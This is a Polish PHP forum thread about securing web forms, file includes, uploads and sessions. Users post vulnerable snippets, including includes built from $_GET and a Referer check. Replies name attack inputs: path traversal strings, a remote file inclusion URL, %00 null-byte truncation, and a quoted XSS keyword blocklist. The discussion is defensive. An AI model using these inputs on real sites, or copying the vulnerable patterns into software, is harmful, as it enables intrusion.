Jakiś czas temu pojawił mi się problem z atakami przez formularze (np. mailowe) - we wszystkich wykorzystuję metodę $_POST. Mója znajmomość php pozwoliła mi na uzyskanie mniej więcej takiej jakości zabezpieczeń:

[HTML] pobierz, plaintext 
<form id="nazwa" method="post" action="">
<input type="text" name="pole_tekstowe" value="" /><br />
<input type="radio" name="jakies_radio" value="wartosc1" /><br />
<input type="checkbox" name ="jakis_check" value="T" /><br />
<input type="submit" name="wyslij" value="wyslij" />
</form>
[HTML] pobierz, plaintext 

[PHP] pobierz, plaintext 
<? 
 
/* w uproszeczeniu podam tylko moje "zabezpieczenia" */
 
if ($_POST['wyslij'])
{
  /* podstawowe zabezpieczenie */
  htmlspecialchars(strip_tags($_POST), ENT_QUOTES);
 
  /* jak chcę mieć spokój z radio i checkboxami to buduję tablice dopuszczelnych wa
rtości */
  $tabl3 = array('', 'P', 'Z', 'I');
  $valid = True;
   if (!in_array($_POST['jakies_radio'], $tabl3)) { $valid = False; }
 
  if ($valid != False)
  { 
   do smth
  }
 
   /* jeśli mogę sobie na to pozwolić to sprawdzam URLa */
  if ($_SERVER['HTTP_REFERER']!= 'http://www.mojastrona/index.php5?name=formularz')
  {
	die ('bad idea');
  }
	else
  {
	wszystkie powyzsze zabezpieczenia
  }
}
else
{
  $obj = new  template_powyższego_htmla;
}
?>
[PHP] pobierz, plaintext 

Ale wciąż mam wrażenie, że to za mało, albo zbyt toporne to to. Z różnych przyczyn nie bardzo mogę/chcę weryfikować wysyłany formularz generowanym hasłem w obrazku. Czy ktoś ma może takie "wzrocowy" przykład minimum zabezpieczeń dla formularzy?

[sobstel]

zabezpieczając się najpeirw należy się zastanowić przed czym się zabezpieczamy

1. po co htmlspecialchars(strip_tags( ? tego trzeba używać przy umieszczaniu danych w kodzie html (chyba ze na zapas), nie mowiac o tym ze w twoim przypadku jest to bledny zapis poniewaz zarowno strip_tags jak i htmlspecialchars nie moze przyjmowac jako argumentu tablicy. poza tym, przed sprawdzeniem poprawnosci danych nie powinno ich sie raczej zmieniac, uwazam ze walidacje powinno sie dokonywac na surowych danych takich jak dostarczono.

2. $_SERVER['HTTP_REFERER'] nie nawsze jest ustawiane,a moze tez sie roznic jak przechodzi przez rozne proxy. lepszym rozwiazaniem jest zastosoawnie jakiegos tokena (umieszczenie tokena w polu typu hidden i w sesji i potem sprawdzenie czy sie pokrywaja). btw, jest to zabezpieczenie przed proba bezposredniego wyslania danych z pominieciem wlasciwego formularza na stronie.

3. wszystko zalezy od przeznaczenia, jesli uwaznie przeczytales watek to byc moze zauwazyles ze nikt tutaj nie ma jednej skutecznej metody zabezpieczania. jesli umieszczasz dane w zapytaniach to trzeba np. uzyc mysql_real_escape_string, jesli dane wyswietlasz to htmlspecialchars, jesli chcesz sie zabezp przed xss to strip_tags [nawet bez tagow html da sie xss zastosowac, chociazby przez nieumiejetnie wykrozystany i napisany bbcode]. kombinacji i mozliwosc jest wiele, a bardzo duzo zalezy od specyfikacji danego problemu.

Ten post edytował sopel 30.05.2006, 08:40:02

[mumin.php]

to może trochę sprecyzuję

Te zagrożone formularze na stronie wykorzystuję do przesyłania maili do konkretnego wskazanego odbiorcy w firmie. Jedne z formularzy to typowy formularz kontaktowy (imie, nazwisko, mail, twoja opinia), drugie to ankiety (dużo radiobuttonów, kilka textarea, kilka checkboxów)

Jakiś czas temu, ktoś zaczął podpinać się zewnetrznym formularzem i rozsyłać spamy - pakowali swoje nagłówki w maila i mieli pełną swobodę. Dlatego zastosowałem htmlspecialchars(strip_tags($_POST), ENT_QUOTES); - dało to taki efekt że przypinane zewnętrznie headers wyglądają mniej więcej tak:

Content-Type: text/plain; charset=\"us-ascii\"

więc już jest bezpieczniej,

$_SERVER['HTTP_REFERER'] =='url' powinno mnie chyba zabezpieczyć dość skutecznie przed podpinaniem się zewnętrznym formularzem pod mój?

[sobstel]

$_SERVER['HTTP_REFERER'] =='url' powinno mnie chyba zabezpieczyć dość skutecznie przed podpinaniem się zewnętrznym formularzem pod mój?

$_SERVER['HTTP_REFERER'] nie nawsze jest ustawiane,a moze tez sie roznic jak przechodzi przez rozne proxy

[mumin.php]

2. $_SERVER['HTTP_REFERER'] nie nawsze jest ustawiane,a moze tez sie roznic jak przechodzi przez rozne proxy.

Przyznaję, że niestety nie rozumiem tego wytłumaczenia

jeśli url www.mojastrona.costam?name=formularz
wywołuje skrypt.php (wywoływany tylko if($_GET['name']=='formularz') ) w którym:

[PHP] pobierz, plaintext 
<?php
if(!$_POST['wyslij'])
{ 
  pokaż formularz 
}
else
{
  if ($_SERVER['HTTP_REFERER'] !='www.mojastrona.costam?name=formularz')
  {
	die ('nie rob nic');
  }
  else
  {
   wyslij formularz
  }
}
?>
[PHP] pobierz, plaintext 

to jak to można obejść?

jeśli pytanie jest bardzo lamerskie to już więcej nie będę męczył

[Speedy]

Wystarczy wysłać odpowiedni nagłówek i w nim zdefiniować dowolny http referer. Można to zrobić w php lub z użyciem takiego pluginu do firefoxa o nazwie `Live HTTP headers`

[sobstel]

Przyznaję, że niestety nie rozumiem tego wytłumaczenia

nigdy nie mozesz polegac na HTTP_REFERER nawet jak nikt przy nim nie majstruje. ktos moze laczyc sie z twoja strona przez proxy a proxy czasami lubia mieszac z naglowkami HTTP, przez co ten sam uzytkownik moze zwracac np. rozne USER_AGENT, to samo tyczy sie HTTP_REFERER. takze, przegladarka moze wcale tego naglowka nie wysylac i wtedy $_SERVER['HTTP_REFERER'] jest puste nawet, gdy ktos przechodzi z jednej strony na drugą. w ten sposob przez swoje zabezpieczenie ograniczasz dostepnosc aplikacji dla niektorych uzytkownikow. dokladajac fakt, o ktorym wspomnial powyzej Speedy, powoduje to ze HTTP_REFERER raczej nie jest najlepszym rozwiazaniem, nie sadzisz?

Ten post edytował sopel 4.06.2006, 19:58:38

[NuLL]

Podziele sie z Wami moim pomyslem jak ja zalatwiam prawie wszystko roboty tego typu w swoich projektach.

Jest formularz

[HTML] pobierz, plaintext 
<input type='text' name='a3ol5m3in5klnw_name'>
[HTML] pobierz, plaintext 

To takie smieszne w nazwie to losowy string - generowany md5 na bazie czasu. Zapisuje sie go w sesji. User wysyla i sie wyciaga z POST wszystkie pola porownujac z tym co jest w sesji zapisane - cos ala token doklejony do nazwy pola. I tyle

Roboty wysylajace spam np. na blogi dzialaja na bazie znajomosci nazw pol formularza oraz adresow - bo tak dziala np. CURL - taki prosty patch rozwala wiekszosc na lopatki Jesli nie ma sesji tzn ze ktos cos majstruje

Ten post edytował NuLL 5.06.2006, 01:44:36

[Vengeance]

@NuLL: Skoro sprawdzałeś to OK, ale dla mnie to żaden problem by bot odsyłał dokładnie te same nagłówki jakie otrzymał od serwera (chodzi oczywiście o cookies) a wtedy sesja zostanie wykryta.

[mariuszn3]

NuLL a co z tymi co mają wyłączoną obsługę ciasteczek?

[NuLL]

NuLL a co z tymi co mają wyłączoną obsługę ciasteczek?

Statystycznie 1,5% - mam w powazaniu

@Vee - napisalem ze prawie wszystkie - z tego co widze wiekszosc botow nie jest na tyle inteligentna aby to zrobic W najblizszym czasie bede mial mozliwosc testowania tego piszac duzy system blogowy

[Turgon]

Czy przechowywanie id sesji w ciachu jest bezpieczne ?
Bo piszę własną obsługę sesji i to jest konsultowane z bazą danych...

[sobstel]

Czy przechowywanie id sesji w ciachu jest bezpieczne ?
Bo piszę własną obsługę sesji i to jest konsultowane z bazą danych...

jest dość bezpieczne, ale najbezpieczeniejsze jest w połączeniu z SSL (https) - w innym przypadku cookies może być podsłuchane (co w gruncie rzeczy znowu aż takie proste dla wielu nie jest). jednakże uznałbym ten sposób mimo wszystko stosunkowo bezpieczny, jeśli wsparty przez odpowiednie dodatkowe zabezpieczenia jak chociażby wygasania sesji np. po 20-30min czy potwierdzanie ważnych czynności hasłem (jak zmiana maila, usunięcie ważnych danych).

Ten post edytował sopel 1.08.2006, 19:33:29

[Turgon]

O to właśnie mi chodziło. Skrypt miałby się w przypadku zmiany danych pytać o hasło i login. Sesja zwykle wygasa u mnie po 30 minutach nieaktywności. Skrypt zbierający śmieci to załatwia.
Ciacho wygasa zawsze po 30 minutach od ostatniej nieaktywności.

Niestety SSLa nie potrzebuje, bo to nie jest jakis skrypt bankowy czy coś, tylko prosty zbiór dzieł różnych ludzi...

[Joachim Peters]

W swoim cms, nie wiem czy zrobić tak:

[PHP] pobierz, plaintext 
<?php
if(file_exists('modules/'.$page.'.php'))
{
include ('modules/'.basename($page.'.php'));
}
else 
{
include ('modules/news.php');
}
?>
[PHP] pobierz, plaintext 

czy na switch'ach?

Ten post edytował d@ro 4.08.2006, 10:50:24

[kalu111]

A jakich powinno sie ustrzegac znakow w zmiennych przekazywanych drogą $_GET , $_POST itd., jeżeli zmienne te będa dalej wykorzystywane w skrypcie. Od razu powiem, ze nie chodzi mi o includowanie plikow, tylko o zwykle parametry, ktore maja wplyw na dalszy przebieg skryptu?
Czy zwykle stripslashes, strip_tags, trim lub funkcje zwiazane z mysql wystarcza?

Ten post edytował kalu111 20.08.2006, 09:56:06

[iks]

A czy mój tok myślenia jest dobry? Mam zrobione logowanie, jęsli podane dane zgadzają sie:

[PHP] pobierz, plaintext 
<?php
if($bazapass == $zpass)
				{
				$_SESSION['userid'] = $userid;
				$_SESSION['nick'] = $podanylogin;
				$_SESSION['level'] = $kto;
}
?>
[PHP] pobierz, plaintext 

A pliki includowane przez panel zaczynajuą sie od:

[PHP] pobierz, plaintext 
<?php
if(!isset($_SESSION['level']) || $_GET['k'] > $_SESSION['level'])
{
echo ' SPIEPRZAJ DZIADU!';
exit;
}
?>
[PHP] pobierz, plaintext 

gdzie zmienna $_GET['k'] wskazuje katalog z którego ma być include() modułu.

Ten post edytował iks 3.11.2006, 13:37:36

[Saddam92]

a czy moglibyście powiedzieć czy ten skrypt jest bezpieczny??
system includowania stron

[PHP] pobierz, plaintext 
<?php
define ('_ABCDE_F', TRUE);
....
....
if ($_GET['mode'] == "") {$_GET['mode'] = 'main';}
if (file_exists("strony/$_GET['mode'".".php")) {
	include "strony/$_GET['mode'".".php";
}else {
	echo "Nie znaleziono pliku !!";
}
?>
[PHP] pobierz, plaintext 

oraz w pliku includowanym:

[PHP] pobierz, plaintext 
<?php
defined ('_ABCDE_F') or die('Bezpośrednie wywołanie pliku jest zabronione');
/* Reszta pliku */
?>
[PHP] pobierz, plaintext 

co o tym myślicie??

Ten post edytował Saddam92 29.11.2006, 13:43:18

[Termit_]

A jak ktoś poda w zmiennej coś typu "../../../../root/jakiswaznyplik"?

[Saddam92]

@termit: to do mnie było
jesli tak to raczej nie widze możliwości..


chyba ze php obsługuje takie nielogiczne skrypty jak sciezka do pliku wygladajac tak:
strony/../../../../root/jakis_wazny_plik
i to w dodatku trzeba trafić idealnie żeby taki plik istniał w odpowiednim katalogu... troche trudne i nie logiczne..

co na to spece od php??

[Najki]

Przed chwilą przeczytałem ten artykuł i nieco się zmieszałem. W jaki więc sposób powinniśmy upload'ować pliki na serwer? Szczególnie grafiki takie jak avatary użytkowników? Przyznaję, że wystraszyłem się o kilka swoich stron.

Szukałem, ale nie znalazłem nic innego na ten temat. Żadne ze znalezionych przeze mnie przykładów nie zawierają żadnych dodatkowych zabezpieczeń. Łatwiej znaleźć przykład kodu omijającego te zabezpieczenia niż faktycznego zabezpieczenia. Ktoś ma jakieś sugestie?


Spytam: czy zabezpiecza mnie fakt, że np. wszystkim przesłanym plikom (niby obrazkom) nadaję rozszerzenie jpg (konwertując wcześniej inne formaty grafik na jpg) ? Teoretycznie powinno mnie to zabezpieczyć, ponieważ serwer nie jest skonfigurowany tak, aby interpretować pliki jpg jako kod php. Ale co z innymi językami, np. Python wspomniany w powyższym artykule?

A jeśli to nie zapewnia mi bezpieczeństwa to czy upload'owanie plików poza document_root wystarczy? Wtedy musiałbym je odczytywać dodatkowym skryptem php pobierającym ich zawartość i wypluwającym ją do przeglądarki.

Ten post edytował Najki 1.12.2006, 10:36:19

[mariuszn3]

Nigdy nie powinno się ufać nagłówkom http, nagłówki te wstawia agent, którym się posługuje użytkownik a nie zawsze to musi być przeglądarka, może to być po prostu skrypt napisany przez kogoś, który chce wyciągnąć ważne informacje z naszego serwera.
W powyższym przypadku powinieneś po prostu użyć funkcji getimagesize() ona po zawartości pliku oceni jakiego typu jest plik czyli przy próbie przesłania skryptu php wywali błąd, który oczywiście możesz przechwycić i odrzucić plik.

[tumeks]

Czyli jeśli będę miał np. wstawiony kod:

[PHP] pobierz, plaintext 
<?php
if ($_GET['page'] == '')
$_GET['page'] = 'news';
if(file_exists($_GET['page'].'.php')){
include($_GET['page'].'.php');
} else 
echo '<div id="blad">Nie znaleziono pliku.</div>';
?>
[PHP] pobierz, plaintext 

To moja strona będzie bezpieczna ?

[Sedziwoj]

@Najki jest proste rozwiązanie nadanie pliku własnej nazwy.
Ja mam po prostu numerowane pliczki, i każdy jeśli rozpoznam np. image/png to zapisuje {numer}.png a nazwa wysłanego co najwyżej służy do opisu w bazie co jako string nie jest niebezpieczne.
Co dziwne jest funkcja do sprawdzania mime mianowicie mime_content_type ale szukając na jej temat znalazłem tylko pliki magic.mime niestety jakoś nie udało mi się tego użyć. Choć przyznam, że tylko chwile siedziałem nad tym.

Mam nadzieję, że dobrze zrozumiałem naturę problemu.

[Saddam92]

no dobrze.. tylko ze tutaj jest sprawdzany typ pliku.. a jak by do tego dodac jeszcze sprawdzanie rozszerzenia przesyłanego pliku

[Sedziwoj]

bardziej wiarygodną rzeczą jest mime, bo plik image/jpeg moze mieć rozszerzenie jpg jpeg jpe i wiele innch dziwnych, czy po prostu niepoprawnych, zdarzało mi się że miałem plik o rozszerzeniu jpeg a program graficzny poinformował mnie że to jest gif i zmienił rozszerzenie.
Ogólnie lepiej oprzeć na mime a nazwę i rozszerzenie tworzyć samemu, bo oprócz rozszerzenia mogą być "błędne" nazwy plików.

Co do podanej przezemnie funkcji, to chyba po prostu zrobię ją sam (dość proste) tylko muszę znaleźć opis większej liczby formatów. Ale to będzie dość proste. (tak mi się wydaje)

Ale ogólnie po prostu nie możemy polegać na tym co mamy przesłane czy to mime czy to rozszerzenie.
Mimo wszystko jestem za tym aby plikom nadawać własne nazwy.

[cadavre]

http://pl.php.net/manual/pl/function.getimagesize.php
a lista mime'ów, które php obsługuje jako graficzne jest tu
http://pl.php.net/manual/pl/function.image...o-mime-type.php

Wszystkie typy mime znajdziesz na googlach:
http://www.google.pl/search?hl=pl&q=mime+types

[Sedziwoj]

No to ten problem da się rozwiązać
Wystarczy wykorzystać:
0 string GIF image/gif
0 beshort 0xffd8 image/jpeg
0 string \x89PNG\x0D\x0A\x1A\x0A\x00\x00\x00\x0DIHDR image/png

lub przy obrazkach można jak cadavre napisał wykorzystać getimagesize, a dokładniej coś co jest w manualu http://pl.php.net/manual/pl/function.getimagesize.php" title="Zobacz w manualu php" target="_manual

Ale też można rozpoznać inne typy:
0 string BZh application/x-bzip2
itd.
Już sobie odpowiedni kod wyklepałem, więc na przyszłość będę miał, no i to zagadnienie już mam troszkę rozpracowane.

[mariuszn3]

Nie wynajdujcie koła na nowo. To wszystko już zostało dawno opracowane przez programistów php.
Jeśli chcecie wykryć typ pliku obrazu wtedy w zupełności wystarcza getimagesize()
Natomiast jeśli jakiegokolwiek pliku to skorzystajcie z rozszerzenia Fileinfo i funkcji finfo_file()

[Sedziwoj]

No tak jak ma się sklerozę... to trzeba się narobić
Ale głupio się czuję, przecież 'wiedziałem' że ta funkcja jest :/
No nic ale informacje i tak nie poszły na marne bo jeśli się pracuje u siebie na windowsie to trzeba mieć plik z mime (chyba, że znów popisuję się inteligencją czy raczej pamięcią)

[starach]

Zabezpieczanie tablicy $_GET ( Żywcem wyjęte z maincore.php w php-Fusion )

[PHP] pobierz, plaintext 
<?php
public function check_get()
	{
	  foreach ($_GET as $check_url) {
		if ((eregi("<[^>]*script*"?[^>]*>", $check_url)) || (eregi("<[^>]*object*"?[^>]*>", $check_url)) ||
			(eregi("<[^>]*iframe*"?[^>]*>", $check_url)) || (eregi("<[^>]*applet*"?[^>]*>", $check_url)) ||
			(eregi("<[^>]*meta*"?[^>]*>", $check_url)) || (eregi("<[^>]*style*"?[^>]*>", $check_url)) ||
			(eregi("<[^>]*form*"?[^>]*>", $check_url)) || (eregi("([^>]*"?[^)]*)", $check_url)) ||
			(eregi(""", $check_url))) 
			{
			  return false;
			} else {
			  return true;
			}
	}
?>
[PHP] pobierz, plaintext 

Nie rozumiem tylko co robi ta linijka:

Kod

eregi("\([^>]*\"?[^)]*\)", $check_url)

Z Wyrażeń regularnych to ja jestem cienki

[Sedziwoj]

Tak mnie zastanawia co się stanie jeśli $_GET nie istnieje lub nie jest tablicą... (nie chce mi się teraz testować).

A jeszcze do podanego na drugiej stronie skryptu z flock, jest błędny, ponieważ ta funkcja zwraca true jeśli się jej uda a false jeśli nie, więc może wyjść, że plik jest używany zwróci false ale że nie sprawdzamy co zwraca skrypt leci dalej i robią się kłopoty.
Trzeba więc sprawdzać co zwraca, gdzieś zamieściłem jedną propozycję ale była na tyle prosta (jak i mogąca zawiesić skrypt) że jej nie podam.

[insenic]

Czy zabezpieczenie katalogu przez .htaccess jest 100% bezpieczne? Chciałbym trzymać konfigurację (między innymi hasło do mysql) w danym katalogu w plikach *.ini. Wiem, że istnieją inne metody zabezpieczania takich danych, ale czy .htaccess jest skuteczna?

[sobstel]

Czy zabezpieczenie katalogu przez .htaccess jest 100% bezpieczne? Chciałbym trzymać konfigurację (między innymi hasło do mysql) w danym katalogu w plikach *.ini. Wiem, że istnieją inne metody zabezpieczania takich danych, ale czy .htaccess jest skuteczna?

nie ma metod całkowicie bezpiecznych, jednak ta jest jedną z lepszych na osiągnięcie tego co chcesz.

Ten post edytował sopel 26.02.2007, 08:51:44

[Ivellios]

Witam, chciałbym się was zapytać, czy przedstawiony przeze mnie poniżej kod ma coś wspólnego z bezpieczeństwem

[PHP] pobierz, plaintext 
<?php 
mysql_pconnect("localhost", "NAZWA_BAZY_DANYCH", "HASŁO"); 
mysql_select_db("JAKAŚTAM_TABELA"); 
$id = addslashes($_GET['id']); 
$sql = "SELECT * FROM nuke_pages WHERE pid = '$id'"; 
 
$result = mysql_query($sql); 
 
 
while($row = mysql_fetch_array($result)) 
{ 
 
?> 
<table><tr><td class="navpic" align="center"><font class="block-title"><strong><?php echo $row['title']; ?></strong></font></td></tr>
<tr><td class="row1" align="justify"><font class="content"><?php echo $row['page_header']; ?><BR><BR><?php echo $row['text']; ?><BR><BR><?php echo $row['page_footer']; ?></font><BR><BR></td></tr></table><br>
<?
} 
?>
[PHP] pobierz, plaintext 

Korzystam obecnie z PHP Nuke i postanowiłem stworzyć własnego CMS'a do obsługi mojej strony www.paranormalium.pl Budując stronę główną nieopartą na tej dziurawej krowie, mając przy tym nikłe pojęcie o php, musiałem niestety zrobić małą, że tak to ujmę, prowizorkę, czyli same include i inne proste rzeczy...

Potrzebuję tylko stworzyć jakiś w miarę prosty i bezpieczny zarazem skrypt, który wyświetlałby artykuły/linki/opisy książek i inne dane zapisane w bazie. Muszę się za to zabrać szybko bo się ostatnio na mnie uwzięła grupa hakerów niszczących strony o tematyce paranaukowej

[Sedziwoj]

Ivellios przeczytaj to co już jest, tam znajdziesz odpowiedź.
Musisz wiedzieć o 'grubszych' dziurach jakie się zdarzają sam, bo tak każdy skrypt byś musiał komuś podsyłać aby sprawdzić.

Co do tego co podałeś, to jeśli pid jest polem typu liczbowego, to powinieneś sprawdzić czy $_GET['id'] jest liczbą, jak jest to dobrze jak nie to ignorujesz. A addslash w takim wypadku jest zbędny, bo jak jest liczbą to nie może mieć innych znaków.

[Ivellios]

Co do tego addslasha to zmieniłem go na mysql_escape_string. A jak będę miał wolną chwilkę to przejrzę cały temacik i pomyślę, co by jeszcze "ubezpiecznić"

[upaupa]

Przeczytałem cały topic - filtrowanie, if fileexist - tylko po co to? Mam taki kod i nie ma bata żeby ktoś tu coś innego includował:

Kod

<a href="index.php?strona=glowna">GLOWNA</a><br>
<a href="index.php?strona=pobieralnia">POBIERALNIA</a><br>
<a href="index.php?strona=omnie">O MNIE</a><br>

<?php
$page=$_GET['strona'];
if(($strona == "") || ($strona == "glowna"))
{include("glowna/glowna.php");}
else
if($strona == "pobieralnia")
{include("pobieralnia/pobieralnia.php");}
else
if($strona == "omnie")
{include("omnie/omnie.php");}
else                             // to ma zabezpieczyc
{include("glowna/glowna.php");}   // nasza strone
?>

[Sedziwoj]

upaupa widocznie nie czytałeś wszystkiego... bo już lepiej użyć switch niż taką konstrukcję, a dlaczego mimo wszystko tak nie jest najlepiej, masz napisane wcześniejszych postach.

[upaupa]

a co za różnica czy switch czy else if? - żadna oprócz no powiedzmy przejrzystości kodu. Post przeanalizowałem dokładnie i dalej sądzę że w tym kodzie co podałem nic innego nie da się includować

[Sedziwoj]

Przecież przejrzystość i łatwość rozbudowy kodu jest ważna.
A czy ja twierdziłem że można się włamać? Chodziło mi o sens budowy sprawdzania zamiast konstrukcji zamkniętych.

[dantekir]

Witam,

Postanowiłem popracować troche nad bezpieczeństwem pewnej stronki...

Przeczytałem ostatnio wiec że lepiej jest w adresie url nie podawać nazwy plikow w postaci np. jakastrona.pl/index.php bezpieczniej jest używać /index.html a to ze względu na fakt iż atakujący nie zna od razu odpowiedzi na pytanie: jaki język skryptowy został użyty do stworzenia strony?

A wiec...

Przypuśćmy że mam taki adres:
www.jakasstrona.pl/podstrona.php?zmienna1=wartosc1&zmienna2=wartosc2

Sladami poprawy bezpieczenstwa chcialbym ten adres zamienic np. na:
www.jakasstrona.pl/podstrona_wartosc1_wartosc2_.html

z tego adresu mogłbym sobie wyciagnac wartosci odpowiednich zmiennych.
Zauwazylem tez ze serwis allegro stosuje taki linkowanie do aukcji, a wiec jest to mozliwe.

Zastanawiam sie w jaki sposob dac do zrozumienia mojej stronie aby po wpisaniu tego "bezpiecznego" adresu nie wyswietlala mi sie strona bledu (404)...
Drugie pytanie dotyczy tego gdzie ustawic mozliwosc wykonywania skryptow php w plikach .html?

Za wskazowki bardzo dziękuję i pozdrawiam.

[bełdzio]

ad1. google + mod_rewrite
ad2. w konfigu php ew. w .htaccess AddType application/x-httpd-php .html

a od siebie dodam: http://www.beldzio.com/ mam nadzieję, że da się tam znaleźć coś ciekawego ;-)

[.radex]

O jednym zapomnieliście - Z includowaniem plików przesadziliście całkowicie! PHP jest językiem działającym po stronie serwera więc jakie jest niebezpieczeństwo?! Można zincludować plik jako przetworzony już, ale napewno nie będzie mógł dostać się do serwera czy innych takich:P

[Kicok]

1.

[PHP] pobierz, plaintext 
<?php
$id = $_GET['id'];
include('/strony/' . $id . '.php');
?>
[PHP] pobierz, plaintext 

Po kliknięciu na link http://server.com/index.php?id=../index.php strona się zapętli (będzie wczytywała samą siebie) a zużycie procesora skoczy do 100%. Może nawet uda się w ten sposób zwiesić system lub wywalić serwer www - nie wiem, nie znam się, w każdym bądź razie jest to skutek niepożądany.


2. Kompletna masakra

[PHP] pobierz, plaintext 
<?php
$id = $_GET['id'];
include($id);
?>
[PHP] pobierz, plaintext 

Po kliknięciu na link http://server.com/index.php?id=http://moj_..._skrypt_php.txt można nieźle namieszać na serwerze.



No chyba że chodzi ci o "ataki" typu umieszczenie na swoim serwerze:

[PHP] pobierz, plaintext 
<?php
include('http://jakas_stronka/config.php');
?>
[PHP] pobierz, plaintext 

to faktycznie w ten sposób zaatakować/podglądnąć kod źródłowy się nie da .

[bełdzio]

@Kicok pkt1 == pkt2 to że dodawane jest automatycznie rozszerzenie nie oznacza, że nie możesz się go pozbyć

@radex_p nie chodzi o samo includowanie, ale o sposób jaki się to robi

[.radex]

1.

[PHP] pobierz, plaintext 
<?php
$id = $_GET['id'];
include('/strony/' . $id . '.php');
?>
[PHP] pobierz, plaintext 

Po kliknięciu na link http://server.com/index.php?id=../index.php strona się zapętli (będzie wczytywała samą siebie) a zużycie procesora skoczy do 100%. Może nawet uda się w ten sposób zwiesić system lub wywalić serwer www - nie wiem, nie znam się, w każdym bądź razie jest to skutek niepożądany.

Przy odpowiednich zabezpieczeniach serwer sam się uchroni:P I nie chodzi o same zabezpieczenia skryptu, ale niektóre serwery logują ip, i przy zbyt dużych "wejściach" serwer automatycznie blokuje skrypt/ip. No ale są bardziej wyrafinowane sposoby na spowodowanie ataku DoS (albo DDoS)

[peen]

hmm... trochę tu śmietnik... zgubiłem się gdzieś na 3-4 stronie

ale właściwie chodzi mi tylko o jedno... test skryptu logującego... jego oczywiście nie podam ale jeśli byłby ktoś tak miły to proszę o jego przełamanie(na pewno się da ... tak myślę )

poza logowaniem proszę o znalezienie błędów... wszystkich możliwych jakby ktoś miał trochę czasu i chęci

adres www.peen.yoyo.pl

PS czuje się jakbym popełniał samobójstwo (modli sie: oby nie złamał tego jakiś zwykły PHP coder )

----------------

jeśli pobieram "dzial" metodą get i wewnątrz skryptu wstawiam prefix "./" oraz sufix w postaci rozszerzenia...(którego raczej staram się nie zdradzić) to w jakim stopniu zabezpieczam skrypt przed niepowołanymi danymi/skryptami?(wiem że o tym było trochę ale się pogubiłem trochę bardziej :/)

co mi grozi jeśli nie ograniczam długości loginu i hasła w skrypcie do logowania? jeśli nie ograniczam też możliwości używania tagów html itp itd....
(konkretny przykład wpisanych danych... najlepiej od razu sprawdzony w skrypcie na stronie wyżej:P)

jak bezpieczne są zmienne przechowywane w $_SESSION? czy jeśli przechowuje w nich login i hasło(forma md5) to jest to w miarę dobre rozwiązanie czy lepiej na prostych stronach unikać przechowywania loginu i hasła w ogóle(wprowadzanie loginu i hasła tylko na potrzeby konkretnego skryptu np. dodającego wpis na stronkę)?

czy coś jeszcze chcę wiedzieć.... -myśli--myśli--myśli... chyba na razie nie

[bełdzio]

boo ;-)


ad1. Null byte attack
ad2. nic jeśli później nie wyświetlasz danych przekazanych przez usera
ad3. średnio bezpieczne zależy czy używasz tylko "gołej" tablicy $_SESSION i session_start czy też innych ficzerów ;-)

[peen]

ad boo. hmm... spróbuj zrobić tak żeby nie wywaliło braku strony bo właściwie to co zrobiłeś to nie błąd tylko taka jest nazwa strony której szukałeś :P(nadaje sie do zabezpieczeń w microsofcie :P)

ad1. hmmm jakoś się poprawi... ekhm a właściwie jak wygląda ten typ ataku (to jest coś z ../../../ itd?)

hmm

ad3. czy $_SESSION jest tak bezpieczne jak komputer i połączenie między klientem a serwerem? jeśli użyje https ... to jest jeden z tych ficzerow? domyślam się że w tablicy nie powinienem goło trzymać nazw pól "login" "pass" tylko jakieś identyfikatory(może zaszyfrowane ) trudne do odgadnięcia a każda wartość szyfrowana? :P

PS hmm sorki za zabezpieczenia ogólne w dziale php

EDIT:

poprawiam poprawiam... usuwam podpuchę z pokazywaniem błędnego działu... robie listę dozwolonych działów... ale z tymi ficzerami to jeszcze będę musiał troche popracować bo w manualu PHP niewiele jest o sesjach...(albo nie umiem szukać) więc google się odwiedzi

Ten post edytował peen 1.06.2007, 17:51:35

[bełdzio]

ad ad boo, to jest błąd i tyle, co za problem przejechac stringa np strip_tags?

ad ad 1/ %00 kończy stringa czyli katalog/plik.php%00.html = katalog/plik.php

ad ad3. ficzery = session.use_only_cookies + session_regenerate_id + session_save_path etc ;-)

[peen]

ad ad ad 1

wpisuje nazwę innego pliku znajdującego się w katalogu... + %00
teoretycznie wg tego co mówisz powinno mi się wyświetlić a wyświetlić a wyświetla się znany ci już błąd
"Strony "(ukryta nazwa pliku)\0" nie znaleziono."

hmm... jestem po prostu głupi i nie potrafię zrobić włamu na własną stronę

ad ad ad boo poprawione... ale pewnie dalej gdzieś jest dziura

ad ad ad 3 ehh to głębszy temat... z czasem się dopracuje

PS wiesz po prostu przeczytam sobie troche na twojej stronce i na innych temu podobnych

Ten post edytował peen 1.06.2007, 19:33:36

[bmL]

Czytam i czytam i już dobre pół godziny czytam i nie wydaje mi się żeby dało się coś złego zrobić z takim skryptem:

[PHP] pobierz, plaintext 
<?php
$plik = basename($_GET[plik])
 
if($plik != $_GET[plik])
  echo '1337?';
else
{
  if(file_exists($plik.php)
	 include($plik.'php')
  else
	 include("strona_glowna.php")
}
?>
[PHP] pobierz, plaintext 

Nie można includować pliku z innego katalogu z innego serwera czy też z dysku twardego...
Wiem dobrze, że includowanie któregokolwiek pliku z tego katalogu w którym znajduje się index nic złego nie zdziała...
Więc, pod jakim względem jest ten skrypt niebezpieczny bo nie mogę się doczytać

[Sedziwoj]

po pierwsze ten skrypt nie działa
po drugie zamiast file_exists() a is_file().
Po trzecie, po prostu bym dozwolił tylko a-z i nie patyczkował.

A właśnie zdałem sobie sprawę, że u mnie takie coś już nie wystąpi <lol> Ech to OOP, jednak ma jakieś plusy

[bmL]

po pierwsze ten skrypt nie działa

Faktycznie zgubiłem dwa ";" i nie domknąłem jednego nawiasu. Powinno być tak:

[PHP] pobierz, plaintext 
<?php
$plik = basename($_GET[plik]);
 
if($plik != $_GET[plik])
  echo '1337?';
else
{
  if(file_exists($plik.php))
	 include($plik.'php');
  else
	 include("strona_glowna.php");
}
?>
[PHP] pobierz, plaintext 

po drugie zamiast file_exists() a is_file().

Dzięki przyda się :]

Po trzecie, po prostu bym dozwolił tylko a-z i nie patyczkował.

Też dobre rozwiązanie :]

Więc czy da się zrobić jakiś włam na aplikację opartą o taką funkcję (basename czy też dozwolenie znaków "a-z" + może "_" i "-") ?
Chyba prawdopodobnie pewnie raczej zapewne na pewno nie